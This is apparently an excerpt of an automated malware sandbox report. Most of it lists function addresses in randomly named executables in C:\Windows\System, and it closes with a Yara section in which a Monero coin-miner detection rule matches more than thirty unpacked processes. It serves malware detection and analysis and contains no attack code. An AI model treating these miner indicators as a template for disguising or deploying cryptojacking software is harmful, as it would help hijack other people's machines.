Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3B5ED90	6_2_00007FF7C3B5ED90
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3B60D90	6_2_00007FF7C3B60D90
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3C4ED80	6_2_00007FF7C3C4ED80
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3B86D90	6_2_00007FF7C3B86D90
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3C0AD30	6_2_00007FF7C3C0AD30
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3C29D30	6_2_00007FF7C3C29D30
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3C55520	6_2_00007FF7C3C55520
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3C4E520	6_2_00007FF7C3C4E520
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3B80530	6_2_00007FF7C3B80530
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3C49550	6_2_00007FF7C3C49550
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3B79540	6_2_00007FF7C3B79540
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEACCFF0	7_2_00007FF6BEACCFF0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA997E0	7_2_00007FF6BEA997E0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB7D010	7_2_00007FF6BEB7D010
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB82830	7_2_00007FF6BEB82830
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEABB830	7_2_00007FF6BEABB830
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA8D030	7_2_00007FF6BEA8D030
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAC8020	7_2_00007FF6BEAC8020
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAAA810	7_2_00007FF6BEAAA810
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAC7010	7_2_00007FF6BEAC7010
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB777E0	7_2_00007FF6BEB777E0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB88FF0	7_2_00007FF6BEB88FF0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB81FF0	7_2_00007FF6BEB81FF0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA9C770	7_2_00007FF6BEA9C770
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB76F80	7_2_00007FF6BEB76F80
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB83780	7_2_00007FF6BEB83780
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB36FA4	7_2_00007FF6BEB36FA4
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAB4740	7_2_00007FF6BEAB4740
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB7C7B0	7_2_00007FF6BEB7C7B0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEACA7B0	7_2_00007FF6BEACA7B0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB73740	7_2_00007FF6BEB73740
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAB9F90	7_2_00007FF6BEAB9F90
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEACB790	7_2_00007FF6BEACB790
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB7DF60	7_2_00007FF6BEB7DF60
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA82F80	7_2_00007FF6BEA82F80
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB94100	7_2_00007FF6BEB94100
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA870F0	7_2_00007FF6BEA870F0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB8F910	7_2_00007FF6BEB8F910
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB940B8	7_2_00007FF6BEB940B8
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAB7120	7_2_00007FF6BEAB7120
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAB8120	7_2_00007FF6BEAB8120
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB658D0	7_2_00007FF6BEB658D0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB6D0F0	7_2_00007FF6BEB6D0F0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEABA870	7_2_00007FF6BEABA870
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAAD860	7_2_00007FF6BEAAD860
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB94098	7_2_00007FF6BEB94098
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB880A0	7_2_00007FF6BEB880A0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB87840	7_2_00007FF6BEB87840
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA9D0A0	7_2_00007FF6BEA9D0A0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB94068	7_2_00007FF6BEB94068
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB51E04	7_2_00007FF6BEB51E04
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB62E20	7_2_00007FF6BEB62E20
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAE1E20	7_2_00007FF6BEAE1E20
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB845D0	7_2_00007FF6BEB845D0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAB3610	7_2_00007FF6BEAB3610
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB2FDEC	7_2_00007FF6BEB2FDEC
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB7ED80	7_2_00007FF6BEB7ED80
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAA9540	7_2_00007FF6BEAA9540
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAB1DA0	7_2_00007FF6BEAB1DA0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB79550	7_2_00007FF6BEB79550
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAB6D90	7_2_00007FF6BEAB6D90
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA8ED90	7_2_00007FF6BEA8ED90
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA90D90	7_2_00007FF6BEA90D90
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB83D60	7_2_00007FF6BEB83D60
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB78730	7_2_00007FF6BEB78730
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAAB730	7_2_00007FF6BEAAB730
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA9E700	7_2_00007FF6BEA9E700
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAA9E70	7_2_00007FF6BEAA9E70
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA9EE40	7_2_00007FF6BEA9EE40
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAA8EB0	7_2_00007FF6BEAA8EB0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAC9EB0	7_2_00007FF6BEAC9EB0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA99BE0	7_2_00007FF6BEA99BE0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB49C20	7_2_00007FF6BEB49C20
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB8F3C0	7_2_00007FF6BEB8F3C0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB64BC0	7_2_00007FF6BEB64BC0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAA1420	7_2_00007FF6BEAA1420
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAA4410	7_2_00007FF6BEAA4410
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB49388	7_2_00007FF6BEB49388
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA87350	7_2_00007FF6BEA87350
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB86340	7_2_00007FF6BEB86340
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAC73A0	7_2_00007FF6BEAC73A0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAB6B80	7_2_00007FF6BEAB6B80
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA9FB80	7_2_00007FF6BEA9FB80
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA98CF0	7_2_00007FF6BEA98CF0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAE34B4	7_2_00007FF6BEAE34B4
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB5BD10	7_2_00007FF6BEB5BD10
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB85520	7_2_00007FF6BEB85520
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB7E520	7_2_00007FF6BEB7E520
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB3AD30	7_2_00007FF6BEB3AD30
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB59D30	7_2_00007FF6BEB59D30
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAB0530	7_2_00007FF6BEAB0530
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB6D4D0	7_2_00007FF6BEB6D4D0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB7FCD0	7_2_00007FF6BEB7FCD0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA9CD10	7_2_00007FF6BEA9CD10
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA9DD10	7_2_00007FF6BEA9DD10
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAB1500	7_2_00007FF6BEAB1500
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB78CF0	7_2_00007FF6BEB78CF0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAC6C70	7_2_00007FF6BEAC6C70
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAA0460	7_2_00007FF6BEAA0460
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB73490	7_2_00007FF6BEB73490
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAA1C50	7_2_00007FF6BEAA1C50
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB73CA0	7_2_00007FF6BEB73CA0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB7A4A0	7_2_00007FF6BEB7A4A0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAB0C40	7_2_00007FF6BEAB0C40
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB74C50	7_2_00007FF6BEB74C50
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB94470	7_2_00007FF6BEB94470
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAA2C80	7_2_00007FF6BEAA2C80
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB94468	7_2_00007FF6BEB94468
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB441F8	7_2_00007FF6BEB441F8
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB7C200	7_2_00007FF6BEB7C200
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB8C210	7_2_00007FF6BEB8C210
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB75210	7_2_00007FF6BEB75210
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAC59C0	7_2_00007FF6BEAC59C0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB81A30	7_2_00007FF6BEB81A30
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAB0230	7_2_00007FF6BEAB0230
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB769C0	7_2_00007FF6BEB769C0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAC8A20	7_2_00007FF6BEAC8A20
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB739F0	7_2_00007FF6BEB739F0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAE3165	7_2_00007FF6BEAE3165
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA9C980	7_2_00007FF6BEA9C980
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA892E0	7_2_00007FF6BEA892E0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAB2AC0	7_2_00007FF6BEAB2AC0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB4CB2C	7_2_00007FF6BEB4CB2C
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB942D0	7_2_00007FF6BEB942D0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAB8B10	7_2_00007FF6BEAB8B10
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB85AE0	7_2_00007FF6BEB85AE0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB80AE0	7_2_00007FF6BEB80AE0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAA8A70	7_2_00007FF6BEAA8A70
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB80280	7_2_00007FF6BEB80280
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB87290	7_2_00007FF6BEB87290
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA9BA40	7_2_00007FF6BEA9BA40
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB7B2B0	7_2_00007FF6BEB7B2B0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB7AA50	7_2_00007FF6BEB7AA50
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB8CA70	7_2_00007FF6BEB8CA70
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB8E270	7_2_00007FF6BEB8E270
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB75A70	7_2_00007FF6BEB75A70
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3CECD10	8_2_00007FF6B3CECD10
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3CEDD10	8_2_00007FF6B3CEDD10
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3DD5520	8_2_00007FF6B3DD5520
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3DCE520	8_2_00007FF6B3DCE520
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3DA9D30	8_2_00007FF6B3DA9D30
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3D01500	8_2_00007FF6B3D01500
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3D00530	8_2_00007FF6B3D00530
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3DABD10	8_2_00007FF6B3DABD10
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3D334B4	8_2_00007FF6B3D334B4

Yara signature match

Source: 38.2.xNhRSWh.exe.7ff699c10000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 17.2.MwFvbxc.exe.7ff7dc870000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 19.2.oxCQuSo.exe.7ff6c9f90000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 7.2.uxMRJKa.exe.7ff6bea80000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 13.2.bzSbRdi.exe.7ff7777f0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.2.jtnQpnb.exe.7ff7a86e0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 25.2.VHwkuIa.exe.7ff781ee0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 30.2.FGSooXz.exe.7ff654030000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 12.2.imwRXsl.exe.7ff74df50000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 6.2.wHnuprt.exe.7ff7c3b50000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 14.2.Csmwgyb.exe.7ff7b8680000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 37.2.ZTSJHKb.exe.7ff725c00000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 5.2.ERbKWDm.exe.7ff67dbc0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 32.2.nWSykjl.exe.7ff77c770000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 40.2.hEUEsIC.exe.7ff61c860000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 9.2.wkazDeV.exe.7ff68b300000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 20.2.vyHGCnK.exe.7ff6acaf0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 41.2.UqXZtcb.exe.7ff7bbf70000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 24.2.eVVPPqR.exe.7ff6e04e0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 4.2.xIpouRJ.exe.7ff6667f0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 26.2.WLWcTVM.exe.7ff6a8db0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 35.2.tyQdqmC.exe.7ff60fc20000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 11.2.wJNkgSa.exe.7ff700a70000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 31.2.mKdsHiQ.exe.7ff757760000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 15.2.defQfgC.exe.7ff6888b0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 10.2.VWrcuzM.exe.7ff748320000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 22.2.VFkciqc.exe.7ff602990000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 16.2.XZxtJFw.exe.7ff7a5920000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 27.2.WCbcoxD.exe.7ff7b66f0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 34.2.iHSYLud.exe.7ff7683d0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 29.2.fpHmIIc.exe.7ff6377f0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 28.2.QWtCxan.exe.7ff670a00000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
